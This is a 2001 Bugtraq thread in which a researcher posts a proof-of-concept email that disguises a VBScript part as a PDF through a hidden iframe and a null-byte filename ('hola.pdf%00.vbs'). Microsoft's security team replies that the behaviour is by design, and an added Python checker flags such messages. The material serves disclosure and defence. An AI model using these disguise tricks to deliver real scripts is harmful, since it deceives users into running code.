
From: Microsoft Security Response Center (secure@MICROSOFT.COM)
Date: Mon Apr 02 2001 - 18:15:10 CDT



    Hi Jesus -

    I'm afraid the situation may not be what you believe. First, your
    system is not patched, despite what the dialogue says. The dialogue
    is displayed if you try to install the patch on anything other than
    IE 5.01 Service Pack 1 or IE 5.5 Service Pack 1, and the text of the
    dialogue is incorrect. This error has been present in several recent
    IE patches, and we're working to ensure that it's not present in
    future ones. Meantime, here's the passage from the bulletin that
    discusses it:

            -------- start ----------
            Caveats:
            If the patch is installed on a system running a version of IE
    other than the one it is designed for, an error message will be
    displayed saying that the patch is not needed. This message is
    incorrect, and customers who see this message should upgrade to a
    supported version of IE and re-install the patches.
            -------- end ----------

    We checked the code you provided below, and have verified that the
    behavior you're seeing is not a vulnerability. Although you're right
    that it's possible for a web site to initiate a file download, this
    is by-design behavior and is unrelated to the vulnerability discussed
    in MS01-020. A Q&A in the FAQ discusses the situation:

            -------- start ----------
            I heard that even after applying this patch, an e-mail could
    start a file download automatically. Is this true?
            Yes. However, this is not related to this vulnerability, and
    doesn't pose a security risk. It's always possible for an e-mail to
    start a file download, and of course the author of the mail can give
    the file a name that sounds innocuous. However, the file download
    cannot actually begin unless and until the user selects a location to
    which it should be downloaded, and clicks the OK button.
            As a general rule, it is probably worth questioning the
    trustworthiness of any e-mail that automatically starts a file
    download. The best action is to simply click the Cancel button in the
    dialogue.
            -------- end ----------

    Hope that helps explain the situation. Regards,

    Scott Culp
    Security Program Manager
    Microsoft Security Response Center

    -----Original Message-----
    From: Jesús López de Aguileta [mailto:aguileta@EUNATE.NET]
    Sent: Monday, April 02, 2001 1:12 PM
    To: BUGTRAQ@SECURITYFOCUS.COM
    Subject: User may be fooled to execute programs browsing with IE5.1

    Hi,

    Playing with Cuartango's recent exploit
    (http://www.kriptopolis.com/cua/eml.html) I've found that it's
    possible to trick a user into executing a file by making him/her
    think it's a data file of some kind (pdf, mpeg, ...).

    This works on both NT and 2000 using IE 5.1 (other platforms/IE
    versions not tested).

    I have already downloaded the MS01-20 patch on the systems tested, but
    both appear not to be vulnerable to Cuartango's exploit (msgbox:
    "This update does not need to be installed on your system"), probably
    because both have an updated Media Player 7 installed.

    I think this is a completely different issue; excuse me if it has
    already been solved/commented on.

    Detail:

    --------8<----cut here-------8<

    From: "Ripped from Juan Carlos Garcia Cuartango"
    Subject: mail
    Date: Thu, 2 Nov 2000 13:27:33 +0100
    MIME-Version: 1.0
    Content-Type: multipart/related;
     type="multipart/alternative";
     boundary="1"
    X-Priority: 3
    X-MSMail-Priority: Normal

    --1
    Content-Type: multipart/alternative;
     boundary="2"

    --2
    Content-Type: text/html;
     charset="iso-8859-1"
    Content-Transfer-Encoding: quoted-printable

    <HTML>
    <HEAD>
    </HEAD>
    <BODY bgColor=3D#ffffff >
    <iframe src=3Dcid:donthurtme.pdf height=3D0 width=3D0></iframe>
    Done<br> </BODY> </HTML>

    --2--

    --1
    Content-Type: application/x-shockwave-flash;
     name="hola.vbs"
    Content-Transfer-Encoding: quoted-printable
    Content-ID: <donthurtme.pdf>

    msgbox("Hello")

    --1--

    --------8<--cut here---------8<

    Making an .eml file with the above content and browsing it with IE 5
    displays a window offering to download or open online the "FILE" (not
    program) "donthurtme.pdf". If the user chooses to open it online, the
    VBScript code executes.

    Another interesting issue is that, when replacing MIME part 1 with:

    --1
    Content-Type: application/xxxx;
     name="hola.pdf%00.vbs"
    Content-Transfer-Encoding: quoted-printable
    Content-ID: <donthurtme.pdf>

    msgbox("Hello")

    --1--

    IE truncates the name in the popup window, displaying "hola.pdf"
    instead of "hola.pdf%00.vbs", making the user think that the
    extension of the program is different. Notice that in this second
    case IE properly asks "Run this PROGRAM" or "Save this PROGRAM";
    only the extension may confuse the user.

    Regards and excuse my poor English.

    Jesus Lopez de Aguileta

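As an added defender-side illustration (not code from either message), the check below parses a MIME message built in the shape of the post's second variant and flags the tricks discussed in the thread: a named part whose true extension is runnable, a name carrying an embedded %00 that a naive display truncates, a Content-ID that suggests a different file type than the part's name, and a part that a hidden iframe in the HTML body loads via cid:. The sample message and the extension list are constructed for this example.

```python
import email, re
from email import policy
# Constructed sample in the shape of the post's second variant (not the original bytes).
SAMPLE_EML = """MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="1"

--1
Content-Type: multipart/alternative; boundary="2"

--2
Content-Type: text/html; charset="iso-8859-1"

<HTML><BODY><iframe src=cid:donthurtme.pdf height=0 width=0></iframe>Done</BODY></HTML>
--2--
--1
Content-Type: application/x-shockwave-flash; name="hola.pdf%00.vbs"
Content-ID: <donthurtme.pdf>

msgbox("Hello")
--1--
"""
SCRIPT_EXTS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".hta", ".exe", ".bat", ".cmd", ".scr"}  # chosen for this example
CID_RE = re.compile(r'src\s*=\s*"?cid:([^"\s>]+)', re.I)  # cid: targets an HTML body auto-loads
def real_extension(name):  # extension after the LAST dot, so a %00 in the name cannot hide it
    return "." + name.rsplit(".", 1)[-1].lower() if "." in name else ""

def displayed_name(name):  # what a naive UI shows if it stops at an embedded %00 or NUL
    return re.split(r"%00|\x00", name, maxsplit=1)[0]

def audit_message(raw):  # returns (name, reason) findings for every named part
    msg = email.message_from_string(raw, policy=policy.default)
    referenced = set()
    for part in msg.walk():
        if part.get_content_type() == "text/html":
            referenced.update(CID_RE.findall(part.get_content()))
    findings = []
    for part in msg.walk():
        name = "" if part.is_multipart() else (part.get_filename() or "")
        if not name:
            continue
        cid = (part.get("Content-ID") or "").strip("<>")
        ext = real_extension(name)
        checks = [
            (displayed_name(name) != name, "embedded NUL/%00 hides the true extension"),
            (ext in SCRIPT_EXTS, f"runnable extension {ext}"),
            (cid and real_extension(cid) not in ("", ext), f"Content-ID <{cid}> suggests a different type"),
            (cid in referenced, "auto-loaded via cid: reference from the HTML part"),
        ]
        findings += [(name, why) for hit, why in checks if hit]
    return findings
```

Running audit_message(SAMPLE_EML) yields four findings for the single named part; renaming it to a plain "report.pdf" leaves only the cid: auto-load note, which the bulletin FAQ describes as by-design but worth questioning.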